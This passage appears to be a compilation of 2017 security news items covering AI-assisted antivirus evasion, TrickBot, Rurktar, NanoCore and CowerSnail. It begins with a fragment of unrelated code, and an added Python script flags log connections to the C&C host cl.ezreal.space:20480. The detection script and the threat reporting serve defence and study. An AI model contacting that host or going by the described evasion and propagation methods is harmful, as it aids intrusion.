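    source, desc = hit
    return {
        "network": "internet",
        "reason": f"unchanged since arrival via {source} ({desc})",
        "sha256": digest,
    }


if __name__ == "__main__":
    ledger = parse_ledger(INGRESS_LEDGER_TEXT)
    for name, blob in (("external", EXTERNAL_SAMPLE), ("local", LOCAL_SAMPLE),
                       ("external+payload", EXTERNAL_SAMPLE + b"\x00payload")):
        print(name, sandbox_policy(blob, ledger)["network"])
```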

OpenAI Gym – A machine learning system creates ‘invisible’ malware
31.7.2017 securityaffairs 

At DEF CON hacking conference experts demonstrated how to abuse a machine learning system dubbed OpenAI Gym to create malware that can avoid detection.
We have discussed several times the impact of Artificial Intelligence (AI) on the threat landscape: from a defensive perspective, new instruments will allow early detection of malicious patterns associated with threats; from the offensive point of view, machine learning tools can be exploited to create custom malware that defeats current anti-virus software.

At the recent DEF CON hacking conference, Hyrum Anderson, technical director of data science at security shop Endgame, demonstrated how to abuse a machine learning system to create malicious code that can avoid detections of security solutions.

Anderson adapted Elon Musk’s OpenAI framework to create malware. The principle is quite simple: the system he created makes a few changes to legitimate-looking code and converts it into malicious code.

A few modifications can deceive AV engines; the system created by the experts was named OpenAI Gym.

“All machine learning models have blind spots,” he said. “Depending on how much knowledge a hacker has they can be convenient to exploit.”

Anderson and his group created a system that applies very small changes to a legitimate code and submits it to a security checker. The analysis of the response obtained querying the security checker allowed the researchers to make lots of tiny tweaks that improved the capability of the malware to avoid the detection.


The machine learning system developed by the experts ran over 100,000 samples past an unnamed security engine in 15 hours of training. The results were worrisome: 60 per cent of the malware samples got past the security system’s defenses.

The code of the OpenAI Gym was published by Anderson and his team on Github.

“This is a malware manipulation environment for OpenAI’s gym. OpenAI Gym is a toolkit for developing and comparing reinforcement learning algorithms. This makes it possible to write agents that learn to manipulate PE files (e.g., malware) to achieve some objective (e.g., bypass AV) based on a reward provided by taking specific manipulation actions.” reads the description of the toolkit published on GitHub.

Anderson encouraged experts to try the OpenAI Gym and improve it.

TrickBot Trojan Gets Worm-Like Infection Powers

29.7.2017 securityweek Virus
A newly observed version of the TrickBot banking Trojan includes a worm-like malware propagation module that allows it to spread locally via Server Message Block (SMB), Flashpoint security researchers warn.

Built by the Dyre gang, TrickBot emerged last summer when it was still under development, but quickly became a fully-operational threat. By the end of last year, the Trojan had expanded operations to Asia, and was observed this year targeting private banking, payment processing and Customer Relationship Management (CRM) providers.

As part of a campaign discovered this week, TrickBot was spreading via spam emails impersonating invoices from a large international financial institution, but also included worm-like spreading capabilities, Flashpoint says.

The analyzed version, the security researchers discovered, could spread locally via SMB, could scan domains for lists of servers via NetServerEnum Windows API, and could also enumerate other computers via Lightweight Directory Access Protocol (LDAP).

The new features, however, aren’t fully implemented and the initial purported SMB exploit has not yet been observed, Flashpoint says.

The malware includes “MachineFinder” and “netscan” functions that leverage NetServer Enumeration and LDAP Enumeration functions. Thus, it can list all servers of the specified type that are visible in a domain, and can also “enumerate all computers that are not domain controllers and resolve them to domains to IPs via gethostbyname and inet_ntoa Windows API.”

Flashpoint also discovered that the Trickbot module includes strings suggesting it uses the Python implementation of the SMB protocol “pysmb” to attempt authentication on Windows 2007, Windows 7, Windows 2012, and Windows 8 operating systems. The threat leverages SMB to determine exploitation.

By leveraging the IPC (interprocess communication) share, the new TrickBot variant also attempts to spread and execute a PowerShell script to download another TrickBot sample onto shared drives and mask it as “setup[.]exe.”

“Notably, this malware does not appear to have logic to randomly scan external IPs for SMB connections – as was the case for the worm that spread the WannaCry ransomware in May 2017,” Flashpoint says.

Based on recently observed campaigns, researchers suggest that TrickBot continues to grow as a banking Trojan with global impact, targeting financial institutions across the world. Last week, Flashpoint noticed the malware adding multiple financial institutions in the United States to its target list, while also targeting users in over a dozen more countries.

After WannaCry and NotPetya highlighted the risks SMB and publicly available exploits pose to consumers and businesses worldwide, it’s no wonder more malware authors are experimenting with worm-like capabilities for lateral movement.

Such modules allow malware to compromise other computers on the same Local Area Network, infect more victims, and enlist machines as part of the botnet. Such worm-like infections could help the TrickBot gang conduct more account takeover (ATO) fraud.

“Even though the worm module appears to be rather crude in its present state, it is evident that the TrickBot gang learned from the global ransomware worm-like outbreaks of WannaCry and “NotPetya” and is attempting to replicate their methodology. Flashpoint assesses with moderate confidence that the TrickBot gang will likely continue to be a formidable force in the near term,” Flashpoint says.

Rurktar Malware: An Espionage Tool in Development

28.7.2017 securityweek Virus
A newly discovered spyware family that appears designed for cyber-espionage is still under development, G DATA security researchers say.

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers’ users, and steal or upload files.

The spyware, researchers say, appears to originate from Russia. Some of its internal error messages are written in Russian and the IP addresses used to remotely control the tool are located in the country, which the security firm considers strong indicators of its origin.

At the moment, Rurktar packs functions that allow it to perform reconnaissance of a network infrastructure and check whether a particular machine is reachable or not, as well as to take screenshots of an infected machine’s desktop, and also download specific files from a target system. Furthermore, the program can delete files from the target machine and can also upload files to it.

“All of this points to industrial espionage - the functions that have been described so far do not have any practical application for large-scale operations, such as ransomware schemes,” G DATA explains.

The malware can also be used to enumerate usernames, computer name, and OS version; get the current preferences the malware is actively using; enumerate the UUID; list hard disks and information about them; execute a command via the command prompt; list current running processes on the computer; and terminate running processes.

Implemented functions in the configuration file include Debug (writes logfile RCS.log to the disk), Port (the port the malware connects to), IP (the IP the malware connects to), FriendlyID (a default return value being used if no UUID was enumerated), NetworkImageQ (sets the quality of the image to be delivered), CaptureDirectory (checks whether a directory exists or not), and ScreenshotEx (sets the extension type for all screenshots).

A great deal of other functions haven’t been implemented yet: CaptureMode, CaptureStart, CaptureStopProcess1, VideoCap, SkipFrames, DetectionPreBuffer, DefPass, DetectPorog, MaxCaptureFrames, WatchFiles, SendOriginPreviews, ControlExt, WatchProc, ScreenshotAutoCapture, ScreenshotPause, ProxyEnabled, and several others more.

The malware uses a wrapper called Snow.exe, which checks whether admin privileges are available or not and executes Rurktar. It can also execute a new process of itself to ask the user for admin privileges if needed. To gain persistence, the spyware installs a new service called RCSU, which is started upon reboot.

What the security researchers haven’t established yet, however, is whether the espionage tool is the work of a single individual or that of a team. Its author apparently uses a Dropbox folder as a working directory, which could suggest that multiple individuals are cooperating on building it and consolidating their work through Dropbox.

“What Dropbox can also be used for by a single individual is a crude and very basic versioning system - some Dropbox accounts offer the possibility of restoring earlier versions of a file. Therefore, it can be used to track changes, but it is not ideal from a developer's stand point. Using Dropbox as a backup is, of course, also a possibility to be considered here,” G DATA notes.

Being a work in progress, the cyber-espionage tool hasn’t spread very widely yet, but that is expected to change as soon as operational status is reached.

The few IP addresses linked to it so far are believed to have been used for testing purposes only. Additionally, the IP addresses used for remote control are expected to see increased diversity and to expand beyond the Russian space, mainly because the actors will start using or repurposing the malware for various operations.

“The Rurktar malware has not yet been found that often, but it has the potential to become more popular in the coming months because of the number of options an attacker has with this malware,” G DATA’s Nathan Stern, who performed a detailed analysis of the malware, notes (PDF).

Creator of NanoCore RAT Pleads Guilty to Aiding CyberCriminals
27.7.2017 thehackernews

A programmer who was arrested in March this year—not because he hacked someone, but because he created and distributed a remote access software that helped cyber criminals—has finally pleaded guilty.
Taylor Huddleston, 26, of Hot Springs, Arkansas, pleaded guilty on Tuesday to federal charges of aiding and abetting computer intrusions for intentionally selling a remote access tool (RAT), called NanoCore, to hackers.
NanoCore RAT happens to be popular among hackers and has been linked to intrusions in at least 10 countries, among them a high-profile assault on Middle Eastern energy firms in 2015.
NanoCore RAT, a $25 piece of remote access software, allows attackers to steal sensitive information from victim computers, such as passwords, emails, and instant messages. The RAT could even secretly activate the webcam on the victims' computers in order to spy on them.

Huddleston began developing NanoCore in late 2012, not with any malicious purpose, but with a motive to offer a low-budget remote management software for schools, IT-conscious businesses, and parents who desired to monitor their children's activities on the web.
However, according to the plea agreement, Huddleston created, marketed, and distributed two products — NanoCore RAT and Net Seal — in underground hacking forums that were extremely popular with cyber criminals around the world.
The programmer also took responsibility for creating and operating a software licensing system called "Net Seal" that was used by another suspect, Zachary Shames, to sell thousands of copies of Limitless keylogger.
"Huddleston used Net Seal to assist Zachary Shames in the distribution of malware to 3,000 people that was, in turn, used to infect 16,000 computers," the DoJ statement reads.
In his guilty plea, Huddleston has admitted that he intended his products to be used maliciously.
Huddleston was arrested in March, almost two months after the FBI raided his house in Hot Springs, Arkansas and left with his computers after 90 minutes, only to return 8 weeks later with handcuffs.
Huddleston is now facing a maximum penalty of 10 years in prison and is scheduled to be sentenced on December 8.

CowerSnail — Windows Backdoor from the Creators of SambaCry Linux Malware
27.7.2017 thehackernews

Last month, we reported about a group of hackers exploiting SambaCry—a 7-year-old critical remote code execution vulnerability in Samba networking software—to hack Linux computers and install malware to mine cryptocurrencies.
The same group of hackers is now targeting Windows machines with a new backdoor, which is a Qt-based recompiled version of the same malware used to target Linux.
Dubbed CowerSnail and detected by security researchers at Kaspersky Lab as Backdoor.Win32.CowerSnail, the malware is a fully featured Windows backdoor that allows its creators to remotely execute arbitrary commands on infected systems.
Wondering how these two separate campaigns are connected?
Interestingly, the CowerSnail backdoor uses the same command and control (C&C) server as the malware that was used to infect Linux machines to mine cryptocurrency last month by exploiting the then-recently exposed SambaCry vulnerability.
Common C&C Server Location — cl.ezreal.space:20480
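Because the Linux miner and the Windows backdoor share the same command-and-control endpoint, a single network indicator covers both campaigns. The following Python snippet is an added example (not code from Kaspersky or from the article) that sweeps outbound-connection log lines for that endpoint. The log layout (`timestamp src dst_host:port proto`) and the sample lines are constructed for illustration; the only values taken from the article are the host `cl.ezreal.space` and port `20480`.

```python
"""Flag outbound connections to the C&C shared by the SambaCry Linux miner and
the CowerSnail Windows backdoor. Added example; log format and lines are constructed."""
import re
from typing import Dict, List, Optional

# Indicator reported in the article: both campaigns call back to this host:port.
C2_HOST = "cl.ezreal.space"
C2_PORT = 20480

# Constructed sample log in an assumed "timestamp src dst_host:dst_port proto" layout.
SAMPLE_LOG = """\
2017-07-27T10:01:12Z 10.0.0.5 updates.example.com:443 tcp
2017-07-27T10:02:03Z 10.0.0.8 cl.ezreal.space:20480 tcp
2017-07-27T10:02:44Z 10.0.0.9 CL.EZREAL.SPACE:20480 tcp
2017-07-27T10:03:10Z 10.0.0.5 cl.ezreal.space:443 tcp
2017-07-27T10:04:00Z 10.0.0.7 mirror.example.org:80 tcp
this line is malformed and must not abort the sweep
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<dst>[^:\s]+):(?P<port>\d+)\s+(?P<proto>\S+)$"
)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into fields; return None for lines that do not fit the layout."""
    m = LINE_RE.match(line.strip())
    return m.groupdict() if m else None


def matches_c2(dst_host: str, dst_port: int, host_only: bool = False) -> bool:
    """True when the destination is the reported C&C.

    host_only=True also flags the domain on any port: operators often keep a
    domain while rotating ports, so a broader hunt is useful after a first hit.
    Hostnames are compared case-insensitively and without a trailing dot."""
    host = dst_host.lower().rstrip(".")
    if host != C2_HOST:
        return False
    return host_only or dst_port == C2_PORT


def find_c2_connections(log_text: str, host_only: bool = False) -> List[Dict[str, str]]:
    """Return the parsed records whose destination matches the C&C indicator."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue  # skip malformed lines instead of crashing the whole sweep
        if matches_c2(rec["dst"], int(rec["port"]), host_only):
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for hit in find_c2_connections(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['src']} -> {hit['dst']}:{hit['port']}  C&C match")
```

Run as-is it reports the two internal hosts (10.0.0.8 and 10.0.0.9) that reached the C&C on port 20480; calling `find_c2_connections(SAMPLE_LOG, host_only=True)` additionally surfaces the port-443 contact with the same domain, which is the kind of lead worth chasing when the indicator is known to be shared across platforms.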
SambaCry vulnerability (CVE-2017-7494), named due to its similarities to the Windows SMB flaw exploited by the WannaCry ransomware that recently wreaked havoc worldwide, affected all Samba versions newer than Samba 3.5.0 released over the past seven years.
Shortly after the public revelation of its existence, SambaCry was exploited by this group of hackers to remotely install cryptocurrency mining software—"CPUminer" that mines cryptocurrencies like Bitcoin, Litecoin, Monero and others—on Linux systems.
But now, the same hackers are targeting both Windows and Linux computers with CPUminer, using the computing resources of the compromised systems to turn a profit.
"After creating two separate Trojans, each designed for a specific platform and each with its own peculiarities, it is highly probable that this group will produce more malware in the future," Sergey Yunakovsky of Kaspersky Lab said in a blog post.
In separate research, security researcher Omri Ben Bassat reported on more copycat groups of hackers who are exploiting the same SambaCry vulnerability for cryptocurrency mining and installing the "Tsunami backdoor," an IRC-based DDoS botnet malware that has been known to infect Mac OS X and IoT devices in the past.
For those unaware: Samba is open-source software (a re-implementation of the SMB/CIFS networking protocol) that provides Linux/Unix servers with Windows-compatible file and print services and runs on the majority of operating systems and IoT devices.
Despite being patched in late May, the SambaCry bug is actively being exploited by hackers. Just last week, researchers spotted a new piece of malware, called SHELLBIND, exploiting the flaw to backdoor Network Attached Storage (NAS) devices.